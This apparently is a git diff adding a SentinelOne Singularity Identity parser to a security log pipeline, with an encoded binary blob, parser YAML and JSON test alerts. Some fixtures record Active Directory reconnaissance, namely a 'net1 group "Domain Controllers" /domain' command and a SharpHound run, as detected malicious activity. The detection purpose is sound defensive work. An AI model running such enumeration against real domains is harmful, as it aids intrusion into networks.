z1ild1?1J4T<&Rpuu~Zg9N($!t&)*-DY?vpK2Gd$H$TZKc!d8--vF-Yg3H1&`ZnZ>R zx>o80iK_?a=VpnCZuZ6+p*!Al7X_sbH|`3A&@-tT2zWhz+tz~iSHjcDw7E3RFj5$r zP!(P_lac#Yrgmu`-&>_~zE{rj9XugAnkdSNXJ*-%3@lCktTq2*tQ(T&$2RCPdL@I2 z`55lTj50pQpbM1xA=yP6efsBA2&gj=#=-mt#2#U)lRM2Y`I}eI*BbL&K(|-evY>sA3ok+|Rf!RIku2Wwq_a_kg)s zo?K5zwi*rbl^D;g0iVtU?czOyGqXGgWlo=p8}LIgRtbG!Ki_E{-%8(diIm8hTM~qv z$oHRgOg^c|vM(--HUwrk^sRbkW@3vZ4_eq8KG=yh0?m>2qb+Z>la)um5%UKh1DNle za}WLd_o?Rx_Z8NSseS&#l>GWwbCbA2CiME>kruKBjNthx!e?x^4anH!^jhc3A0+^r zFEI>SnAY^+eq$mATY#4$Z#kt!MZz|!*y(0aPOcvQQdsyz7u;Dpg#{w1yq(XN4V^I@ 
z-#Z2wg88!EZY2#>%H~S>uCzn<{``usED#u-p>~o|ErboE3d}$>{ZF++x}( zzvuVfH!lUJjlrmCxhc86?wBV)$>ooAZC;$#tDg3{Y{xm%WV-nUc{(+t^7=eA@rUhC zVLKX&;(io+@PD1_f!=pJw-5jJY7|IHY-N<92;X=VC_z0q_a=c~OMl_%fzOPpkcb+X z2j4J2-yJd`O+amd_gW&aYYsA>eoe`WCZqGVHZ(L0-)$LOuZQ00Sx$QtHKX-RS7N<1 zR5tBxS7B}bWW6gO_Y;JpguZ_rXY5pP)H3FmG(c*;l`Ngy#ud)RsL2{SQ$;;VVwQz? z7mn*!tjNyQ6-bc$Lyfp`cS}qD`4mw^+aNeUD#+rKw_&#w|8=9;kDwA_#vT@Tjpb>) zRLmE1nfsk4MS;B18gb)sef%EL57FfvvI9S1BklDlWE?n<;4=RvA8z}FG_{P*?LY*~ z=R7bzKCXvwP5f}uI6=is)rjy>m#o~GQN5u6&u0kZ<{iJ{^Rl9+7-Ig$gF&@4tbAvW8%*B!O6J*?B=du;hcM&I3K_Ff|w;swd_8}=b?1&JqhkjaY_aS z^b5LqqpZl%_ep#s+KzsH=k4S($7FJSO!Srxoe(Tl>dLq?DMBK#M%#FM>l84ae2xW6 zp_m)~l(5D3Ce^=mxYQm*1XV(krt0m+_#@%3t$#VI9cCfDz`n76gP8ppik*H+K zZT{&e1F;ZF_OQj%royE^r%gQn(F^jhxzku}uleB^)h81=o&&abH#avU3k#nBhUrTO ztyS2pvm#JhTbCz4VMDnze%uxJU?$njgD!n?m*T!!wo5Kext(#s>Q?|$LOc)9-~2$J zl5x0h_K73HbY^??{QYxo_^lX@w(n#A3o*$=Q{nc|sU>|rEnYev#!e3=lJY!1$jI!d zp!ESG4yBEh&LqC_uN0To_Uup37b#XFmgr8{JH;_VFSlct|NKHsuPAEc-jpYEv5n=Z zm!{Zt944C6-y?_n zLJfAMj6jeh2xocL#OAui?^hwkSLcM&Pvzp?^hTlMVpNS`7hCzse!qkr$cuGf`y~+XjoRjjqn#-C)99m z8M3AqQI)TC(M*bcSxhz+jw0W>M*`hO0s(=gJsw{lxUpm6r^ZHL+V2)oi1Ek==*ZtCmP7Vx%voClFzk>~;A@zp-8k&1Vm7bVp zwtAyNyID-Z7P&RtoR6*0p@kx)?1un@1=cHPl2>q==-zK`i(~U;tGYj*EN7-((^y_| zsbd_@yOIPm^LEkq3trq4l#(*>?k82Ysj9k8J`F+MfSI+y5HOy8>2}sOBWMA%W`7L0 z+Y|&pKNALOBKjSQ6%zqvYFX4%=D|19@{YAJzpHH+x_V$>U?v_M2O2N!M`f%{ijTGz zL3Ot^kX?aIklgxA3Z2zZB%K;DsKPP8F|)oOMidL_y!A2~snMOan0^Elb#tAH=-UMc z0&xG~p~uwW@aso(9K4r60sCA)k(DPbs?6%vR*ZIu?xoijY|B5wn7ntsZ$zNl_r0=V?h4HC~F`m!%3q8|bd3n=qBX`B$Jhn8o$WOF*-NU9&WkpEwzQPvY_8N*( zG2y+S!&SrJ^#(8NVFXn=0Gc6rclk#&S(D3by(4aL5Qldn^?Hmp^&P9Z8t2{m_a^s` z{5y_D6%V8V<{V8(m%+lX=snpyaJ}HIGD)lRs zYCmnc`j`?*7N0>w&39cjqfYA+Jj=f;-kjbwt4F)C^$^rGwQUW}iF4t`nS!$qfbk#- zOU}`jD2Xsl38qd{JzBPn4(9mZqS4hE+|-KPM5K(a6Gg*gty`68OvmQ6KkUdMJif6E z#EaQ?YPp#K=IQWTBnj&N@-8TaNlT{NbFJtFDgS-F#5)rs`u_Cn?y7k1HR>;X?lWn7 zT2Zo(dt4UWUxX-?dTp4`x@z2eHnopejC8XNqn#7)*f~d=ZXbO}4|_1}lBhaB2D$2z 
zl}!7YT%pw2g6}=1$wLVXg~@~(KXIgHnII~;slp0;{UMsh~K&-`Vej(cb#qwE+PP#&bs zb1}b#>3~R<#OJp(Y2%0$@=^X4yv`rHLg^v{UT|}8`WCOf<&5V)4_>>~a~dPBb5d08 zY9VmO^y776a)PQy!RXt<%>XWv zdgbi>;Rg=^`$AGEOWl)BjUmR4R{BQ}qr2R1E&{19x^lnL0zE*dL9bQ9iSCtuAHc|T z20?Y#ZHeE1b-5z|?(9_N+a|BfY^2?i6WPKohFDVE-d{40v1SCl=>YAc?KZv#pzSgT0+TKY(#tiSCHSsFfDQhGSeCZ(!cVUPD zmxGLr%*N>7snNu;p8Y`31bv_hdsmSdjJ!z#c01iDdi$3N6)lu5?^l$4F_RqnYb0uA z)8eDncvVFpwFA>DIR4BjjH{D1VS57Q#`)OT5+UcrNo+`7Vm~pX#i1+vlI?;V;o4z{ zNX34A+U*oAcYzuH$6R2kAd-1%(NH(B*RzlX7%1Wse~HhKJ`y35dP2UG&!*}>X3`V< zn^{7_LZrrmylfZc?v%6>*#-UNb`vV4=2PGZnt25KtxV8}Q?rn9Vj^(vUC9pmWjoZA z&~9K>?i5CiLwUKj98+wL(>$w#`v{8jlJIE>#dV4qg5f|!- z?!bG!&&gB$YWAc9eDs8uEzI0=$|TVJ$^fy)4na4d6$%7CDm~X*w=Y%exbxyy9-WRb zgT>2leLtbD4o@`rCaTq7P0syyx6ht7Jv*4vS&f?}MIN6h&98aA>RVu-!^hUTHCCdD zx=DCyyd!2#i}?0M1O@9%6^6~Nr^ZezUP*sm`h4TN?pvwnG?Wp%Lr!d{k(rY-pGM}@ zk6%L0`*4LCiFPhuU#xL0;!Acl(+UT7p)^DP$NuP?LREvG6>k ze}?s8{KPH?^$>J#xWs%BE{f1zfMD+qc+yRZ(8!)$T#{#4LDFbuh73%Z$yY8oXs&_KH@IPhIh zdw`j#4rlAV+$Xg(e_GdWf-aVXvfe(X{QB2wi2ENLaHcdUF0V&-hdI!KE5jU z69wuV9TahcS1W1n4P0mI*ZD{QXmz2tj4yFBfTd}=2h!dmk{VOve11dsj7T;+e{qp< zWG$A6ct)aIRsoebxaj9HpWb4P?o#KRpXO#me{j)XX;4x_z#H{< zY<&2t=erEe>v@7I-`(lOnYc=`%XxFy8Oz!AuCQLw2<$oBPaF*PTiq=6q=@y*CwJ`Osqa6D`9Bb`1XbFAxvl z{@njYK;y;q(h3|Q5$*#1H9ygH`$4m*oDS(MCpt%Hm3EzM0=ZRI~$3JWWe#{G{8D>t^9mm7Udcl=A zlbX3nKEO?lP7+>yJq&+2^Gc9$P#CYHaB=^|i!nz(<2Pr)JdBx8NkI`>i}+>FrA%lN zYQR0yyPjz&3R+1Xd7`8gn=-P&oosr=2zpIky{8~aocA^|x~pQ}@A4*tv$I6h=o+df zlp3ro@j29*bMDjIr;qQZ&ftFxTuEp?cQK+2YYx+xIN_&$>-qc++h$-sv>Jmo-vhTp zXcPP0D)s{Omu;n;G|}3>!e|HQ!>z`yOSg(ayQ?g>{}NY^#JyUtH$TF9AlRkHV(`@~ zi6Ln~ppPxOgov_nYH~cdaI|OaKrEGz@;mqiwX>oTej$P8R~%CtWY_VL0!0Mz73H~J z!+9T4)s&T#v$JU{Vbd453uHTU$dAU;e8Z_b*&%9&EE?|I{=EQrXO!m<6FKd~A3ZH9 z{b7pgjYsG@nD{vQKeMURK@%=D*8U*eATW4W1?Mqn&y4_6$dcibbbA7+-C&7iYuC!P7 zx8dgAZ*1WH*1&KUh;N;Ojp@WmXvlVHM$`VwV<~qLG1Q?jXmB0hreXHkn0=b^*|{Hc z80FjNBNsvpo$e$#_1ub>)nW7xe)97t14*68H0!qSm!rVNm}dN1$o^z@oI~l@wUM&I zDJ(1;=3vhVNn2{zoVjcINpFt<& 
zFEOF7fYTul#(_YV2GrE-+vc>D0?MLdz|w1ZwsNh&A^5!Ko?Z|3gC1|cb~41o40HaU zOi5#?(_BIqk$YapBikmKrCyfZsRi)9uHKezNLUU8$RFnoT~DeeOTVqE3vHOcyY_JZ zUbv$pNPlFsHB5`6pEnqLWyIQ-n~ z(~hJP_QuG~04-It)@|Feg1uvbr|C-)m?fOt=1(30!Dgv!!Y{^dBNwC{>%vlb< z=z^niGIP*ZSUN(UHAT7P!O~3NR2c-Y{x8{%*SWnuA$-T=pzeOR6ve7OIDiliS?HUlH}tC-BqPk?zCQ(&vJ9{Bf9 zMORmsQw!iRq+W^o4gUs~ru3L3B2t6JACZ1V+FN@@jT}_u5@=0P^*8XJ&kmB-p{7n& z3mkH9{eD>oLY#5%+}E)#qu?i;xp>a+Pk5s3+1sB*i6ZGeV_jd zIS6*<6a2JOWHS!5_tWM^8EM5}xJIRGR=;gEv+uDI&v{=2q_HcO zl#T(odO$OXnl^hGGO(`^hCLC!Ve~608}+h2AOPCF9XCl?S&Eqcr0lO94SfHuIlAs8OH$jq zQdV%)W!@UP1{0;kqXRjF55y<3@CA{uZN@D#ebr9s)HYWug3bw{9lX80!w&6*=#haa z$ucM~TlHBv9FHH>Yd-?;deuQ(-tWaaT734!w`A^;QRdHmQ^M@++a zM5Y|kRyDLAj1B{K2>XP=;*5X_OR9jUtjUCQS_J$57Qo0c4K4f7i5OE~1wi!av9UVl zU0rTJ@jhWN6?>HC`q1y=i3UKgILuuLxK*<$1?{~p$@fb$^VB%^AAR|~TRhR15_~oZ z)P@=}kA%A?woiKjzjaL2J5F(}hVyf!JY8TYa7?Rm{s)hnxqmRyQ8WYJZeee55}rRp zMJeT@KrcFjt_C9J=znMX&ajinA%EbChekK+Imv395quCXWOD9OdmDUL^wW^dO~tr- zQxIw{!Zw%K)b@U9(U}<$`hukxW{!DFkTC@56v-QE^i}fa+#BAz%Kvl7&nW69Zq?gg z?{?{X^HULMrX)l~r;i?*1IXQySr1mxA#zs_At@yE-jG+n!xW58AF^REL9*s)qLslv zycCESJXvq0v(#^%zZCq{6h3g$VIP#AQAuTjTe!fbE63_bM%<|dbzk6;;|Ix#&>54G zllP-LqC5X%X?_2rU^3bZ0C()Mqy#WN33O$p68WP1VqqIv*0TL|i0E6QM6I!YD25Wa z1oGt=NVD>0f?KZe@0Ff6kjrI1^zCP;+D=rlax!lK2F`6V(;4jI!kh8-=@P(Gm(2z2 zttlK|mt%^J4)n*euDAe2_*Ci zTWyg&m%{jsotU+UV9#}p7cYRLG6Z0eP@JEKh^Q_b^|*|SU_kf?Jw5j&(#9f&l)c?= z|LV`$+8W;*%HS!6hU)nN7UqZF{<15FHU?qxWAO)HcE}UN9(R;%hN!S=ImuHSmyPG} z9d@7QpWc`;p;-238#V=o;^R;H#AnXi_~0tGHQwuD9ha8@EzhLs5pT;UleIV=xKj!C zQ&tzG}7-uci+D`bDOo?rG^jf*;39$KsW0 z{%n;T*y2aDgSlyNI>1sRfQVDL0ofd@=X60W-BMbF;FC#!Bvg&_m%91by4N!a(7RBd zeu~UX6C;#=Ujn`oph6w$hZjWdqp1A zl`j>IOS+pULa#gxRSv8|9Xs>6?>U=gs6Ulud;d({D>^?-7syFRm;k7A%8zw7D3g8p zs<=$}d=;`G+Vx{xF1`gkF1G^4`6{K&JONCry;$jF-pKQL`|WI;T)S$`4%~JgLH<{Q ze`QyxP`@zA^r-p091?p3n3pVlgXaNiNz5+#nt|{%`mkKLCeZ&2MJX8h0c|)w9m3ahh3oy({*Qgz($4swK~wmJsxdF zjngNUb}g4(>|9nY<>3@c+tAEp`#3M0Hxz8vAWjaGHTLX%)CiyTBk0zq#!Hu*KbLBZ z&Mq4j+f`DIpv}#(v$N}x+%Io_G&pZEz;|v%WU0M3;#6!r6{7`2ZImsdspYS>&a&0) 
zC+Oe$J*kAvfN0m5RK;?0B6r(3fp~|s2wkGIE*Q_o|QK+%EEWFQ*W^Uf4qjl&F=pgV=7nGKKv z;X495H7mb9p(=J{%O)KyJ&+C-1XXbuENWr9{C3WcUK6|(`)gy?{ca~m?cYU!-fQ^Z z?$Pg{JsYSBS=51q(0+#|*QvEb?+Y6)@U<-C+CiOgUZ?_Kc2yopKjM~rrO5dgR?4a% z*8JC>Jf1)6v5A`QGwKQKgqVi?HP$Jdgv&!Z9h?2UX}Y~N+OJpiUoCecYJR|Ir=;C$T?WFSWTsaWNfZx2;rOU`j53yUT4*k5 zVeb&hb1pWGkQA6xL(Oi&e@RaCdU?Ui_7|vkh3@)WKI@|Y8%2sEwX?T3mWhGExVvl! zq$~^quQVlrzSdc7b(iu_!J9MeU0i~kyPhIiUFk4HcDLmKN=H|3Zfcl`GAl%rg=hb$ z;hW({-~Q2*4Z*MvB)bxyz5;b^#qALt_wIaDy{y=I48{?MXAr)5k*`^V zTeO@S+iqJ^QAJsjQoSNw-kqKsvlGf<9KSgxnP ziZ&Giyvs%?D@ourkOn~~UF&d=@bKspgvT*}7fCHLFakBCHve&ef*bdo_wy9iY^Y`- z`-Zdw?Xwp+dcFCw+OZi%>ro<)uS)HT;8?sqpoYpvhTY!yM2d!LD;)5%#e#iRW;6;- zb3hA!u{Yk2q}FIpq%bD$OxU^~)84@Ym!Hx+rOcraN&*5SvgEEe#>|Y2?XkOUz@pW~ zyQZx@#hI)9y~LIw&%J?-+!lyi3Gcfwf`B4L3$`=F=2fw@`-}}`?#NfM{)mxLvfp>H z0VGA$&8}#ZCrI2Bo&N@mi-s+Ig^7*+{2APA{jqdCu2iQ|kV=Jy&OS-Tf-rn!-75ceuVY)J@af{xO~L z^=e(%2ZDNG68?wFm~UeE@4x`5u0c*g0VrCIY!8%&f)v5bRI}7Ee+xbcqJTKm*+JIJ zo|6t?@RRQ8BR#IJ- + SentinelOne Singularity Identity is a cybersecurity solution that provides identity protection and zero-trust security by continuously monitoring and analyzing user behaviors to detect and prevent potential threats. + +data_sources: diff --git a/SentinelOne/identity/_meta/smart-descriptions.json b/SentinelOne/identity/_meta/smart-descriptions.json new file mode 100644 index 000000000..ad570cb92 --- /dev/null +++ b/SentinelOne/identity/_meta/smart-descriptions.json 
@@ -0,0 +1,46 @@ +[ + { + "value": "Alert defined {sentinelone.identity.name} with status {sentinelone.identity.status} on {process.command_line}", + "conditions": [ + { + "field": "sentinelone.identity.name" + }, + { + "field": "sentinelone.identity.status" + }, + { + "field": "process.command_line" + } + ] + }, + { + "value": "Alert defined {sentinelone.identity.name} with status {sentinelone.identity.status}", + "conditions": [ + { + "field": "sentinelone.identity.name" + }, + { + "field": "sentinelone.identity.status" + } + ] + }, + { + "value": "Alert defined {sentinelone.identity.name} on {process.command_line}", + "conditions": [ + { + "field": "sentinelone.identity.name" + }, + { + "field": "process.command_line" + } + ] + }, + { + "value": "Alert defined {sentinelone.identity.name}", + "conditions": [ + { + "field": "sentinelone.identity.name" + } + ] + } +] \ No newline at end of file diff --git a/SentinelOne/identity/ingest/parser.yml b/SentinelOne/identity/ingest/parser.yml new file mode 100644 index 000000000..507745cb7 --- /dev/null +++ b/SentinelOne/identity/ingest/parser.yml 
@@ -0,0 +1,67 @@
+name: identity
+pipeline:
+ - name: json_event
+ external:
+ name: json.parse-json
+ properties:
+ input_field: "{{original.message}}"
+
+ - name: detected_at
+ filter: "{{json_event.message.detectedAt != null}}"
+ external:
+ name: date.parse
+ properties:
+ input_field: "{{json_event.message.detectedAt}}"
+ output_field: timestamp
+
+ - name: started_at
+ filter: "{{json_event.message.firstSeenAt != null}}"
+ external:
+ name: date.parse
+ properties:
+ input_field: "{{json_event.message.firstSeenAt}}"
+ output_field: timestamp
+
+ - name: last_seen_at
+ filter: "{{json_event.message.lastSeenAt != null}}"
+ external:
+ name: date.parse
+ properties:
+ input_field: "{{json_event.message.lastSeenAt}}"
+ output_field: timestamp
+
+ - name: set_meta_fields
+stages:
+ set_meta_fields:
+ actions:
+ - set:
+ event.kind: "alert"
+ event.category: "intrusion_detection"
+ event.type: "info"
+ observer.vendor: "SentinelOne"
+ observer.product: "Singularity Identity"
+
+ "@timestamp": "{{detected_at.timestamp}}"
+ event.start: "{{started_at.timestamp}}"
+ event.end: "{{last_seen_at.timestamp}}"
+
+ event.provider: "{{json_event.message.detectionSource.product}}"
+ event.reason: "{{json_event.message.description}}"
+
+ process.command_line: "{{json_event.message.process.cmdLine}}"
+ process.parent.name: "{{json_event.message.process.parentName}}"
+
+ file.path: "{{json_event.message.process.file.path}}"
+ file.name: "{{json_event.message.process.file.path | basename}}"
+ file.hash.sha1: "{{json_event.message.process.file.sha1}}"
+ file.hash.sha256: "{{json_event.message.process.file.sha256}}"
+ file.hash.md5: "{{json_event.message.process.file.md5}}"
+
+ sentinelone.identity.id: "{{json_event.message.id}}"
+ sentinelone.identity.name: "{{json_event.message.name}}"
+ sentinelone.identity.attackSurfaces: "{{json_event.message.attackSurfaces}}"
+ sentinelone.identity.status: "{{json_event.message.status}}"
+ sentinelone.identity.classification: "{{json_event.message.classification}}"
+ sentinelone.identity.confidenceLevel: "{{json_event.message.confidenceLevel}}"
+ sentinelone.identity.result: "{{json_event.message.result}}"
+ sentinelone.identity.storyLineId: "{{json_event.message.storyLineId}}"
\ No newline at end of file
diff --git a/SentinelOne/identity/tests/test_alert_1.json b/SentinelOne/identity/tests/test_alert_1.json
new file mode 100644
index 000000000..1e8b5bf2b
--- /dev/null
+++ b/SentinelOne/identity/tests/test_alert_1.json
@@ -0,0 +1,49 @@ +{ + "input": { + "message": "{\n \"id\": \"ba485919-e4c1-4496-9e2f-feb320f6841a\",\n \"name\": \"Domain Controller Discovery Detected\",\n \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\",\n \"detectedAt\": \"2024-11-22T05:35:09.000Z\",\n \"attackSurfaces\": [\n \"IDENTITY\"\n ],\n \"detectionSource\": {\n \"product\": \"Identity\"\n },\n \"status\": \"NEW\",\n \"assignee\": null,\n \"classification\": \"ENUMERATION\",\n \"confidenceLevel\": \"MALICIOUS\",\n \"firstSeenAt\": \"2024-11-22T05:35:09.000Z\",\n \"lastSeenAt\": \"2024-11-22T05:35:09.000Z\",\n \"process\": {\n \"cmdLine\": \"C:\\\\Windows\\\\system32\\\\net1 group \\\"Domain Controllers\\\" /domain\",\n \"file\": {\n \"path\": \"c:\\\\windows\\\\system32\\\\net1.exe\",\n \"sha1\": null,\n \"sha256\": \"18F76BC1F02A161EBDEDF3142273C186D05A836ADDCAAEE599194089FD59F398\",\n \"md5\": null\n },\n \"parentName\": null\n },\n \"result\": null,\n \"storylineId\": null\n}" + }, + "expected": { + "message": "{\n \"id\": \"ba485919-e4c1-4496-9e2f-feb320f6841a\",\n \"name\": \"Domain Controller Discovery Detected\",\n \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\",\n \"detectedAt\": \"2024-11-22T05:35:09.000Z\",\n \"attackSurfaces\": [\n \"IDENTITY\"\n ],\n \"detectionSource\": {\n \"product\": \"Identity\"\n },\n \"status\": \"NEW\",\n \"assignee\": null,\n \"classification\": \"ENUMERATION\",\n \"confidenceLevel\": \"MALICIOUS\",\n \"firstSeenAt\": \"2024-11-22T05:35:09.000Z\",\n \"lastSeenAt\": \"2024-11-22T05:35:09.000Z\",\n \"process\": {\n \"cmdLine\": \"C:\\\\Windows\\\\system32\\\\net1 group \\\"Domain Controllers\\\" /domain\",\n \"file\": {\n \"path\": \"c:\\\\windows\\\\system32\\\\net1.exe\",\n \"sha1\": null,\n \"sha256\": 
\"18F76BC1F02A161EBDEDF3142273C186D05A836ADDCAAEE599194089FD59F398\",\n \"md5\": null\n },\n \"parentName\": null\n },\n \"result\": null,\n \"storylineId\": null\n}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T05:35:09Z", + "kind": "alert", + "provider": "Identity", + "reason": "This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.", + "start": "2024-11-22T05:35:09Z", + "type": "info" + }, + "@timestamp": "2024-11-22T05:35:09Z", + "file": { + "hash": { + "sha256": "18F76BC1F02A161EBDEDF3142273C186D05A836ADDCAAEE599194089FD59F398" + }, + "name": "net1.exe", + "path": "c:\\windows\\system32\\net1.exe" + }, + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "process": { + "command_line": "C:\\Windows\\system32\\net1 group \"Domain Controllers\" /domain" + }, + "related": { + "hash": [ + "18F76BC1F02A161EBDEDF3142273C186D05A836ADDCAAEE599194089FD59F398" + ] + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "ENUMERATION", + "confidenceLevel": "MALICIOUS", + "id": "ba485919-e4c1-4496-9e2f-feb320f6841a", + "name": "Domain Controller Discovery Detected", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_10.json b/SentinelOne/identity/tests/test_alert_10.json new file mode 100644 index 000000000..deb56e2a5 --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_10.json 
@@ -0,0 +1,34 @@ +{ + "input": { + "message": "{\"id\": \"01935322-7b49-71f0-89e0-f52562c26e53\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T09:09:48.731Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:09:48.731Z\", \"lastSeenAt\": \"2024-11-22T09:09:48.731Z\", \"process\": null, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935322-7b49-71f0-89e0-f52562c26e53\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T09:09:48.731Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:09:48.731Z\", \"lastSeenAt\": \"2024-11-22T09:09:48.731Z\", \"process\": null, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T09:09:48.731000Z", + "kind": "alert", + "provider": "Identity", + "reason": "This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.", + "start": "2024-11-22T09:09:48.731000Z", + "type": "info" + }, + "@timestamp": "2024-11-22T09:09:48.731000Z", + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": 
"UNKNOWN", + "confidenceLevel": "MALICIOUS", + "id": "01935322-7b49-71f0-89e0-f52562c26e53", + "name": "Brute force attack - Mass Account Lockout", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_11.json b/SentinelOne/identity/tests/test_alert_11.json new file mode 100644 index 000000000..a4d81025f --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_11.json 
@@ -0,0 +1,49 @@ +{ + "input": { + "message": "{\"id\": \"01935310-d00e-7616-81b9-fcb227ebb13d\", \"name\": \"Domain Controller Discovery Detected\", \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T08:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935310-d00e-7616-81b9-fcb227ebb13d\", \"name\": \"Domain Controller Discovery Detected\", \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T08:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": 
"2024-11-22T08:45:51Z", + "kind": "alert", + "provider": "Identity", + "reason": "This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.", + "start": "2024-11-22T08:45:51Z", + "type": "info" + }, + "@timestamp": "2024-11-22T08:45:51Z", + "file": { + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe", + "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe" + }, + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "process": { + "command_line": "Sharphound.exe" + }, + "related": { + "hash": [ + "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + ] + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "ENUMERATION", + "confidenceLevel": "MALICIOUS", + "id": "01935310-d00e-7616-81b9-fcb227ebb13d", + "name": "Domain Controller Discovery Detected", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_12.json b/SentinelOne/identity/tests/test_alert_12.json new file mode 100644 index 000000000..1618da843 --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_12.json 
@@ -0,0 +1,49 @@ +{ + "input": { + "message": "{\"id\": \"01935310-eb28-7a57-9c27-87843b2cec61\", \"name\": \"AD Service Account Enumeration Detected\", \"description\": \"This event is generated when LDAP queries for enumerating service accounts are detected from an endpoint.\", \"detectedAt\": \"2024-11-22T08:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935310-eb28-7a57-9c27-87843b2cec61\", \"name\": \"AD Service Account Enumeration Detected\", \"description\": \"This event is generated when LDAP queries for enumerating service accounts are detected from an endpoint.\", \"detectedAt\": \"2024-11-22T08:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T08:45:51Z", + "kind": "alert", + "provider": 
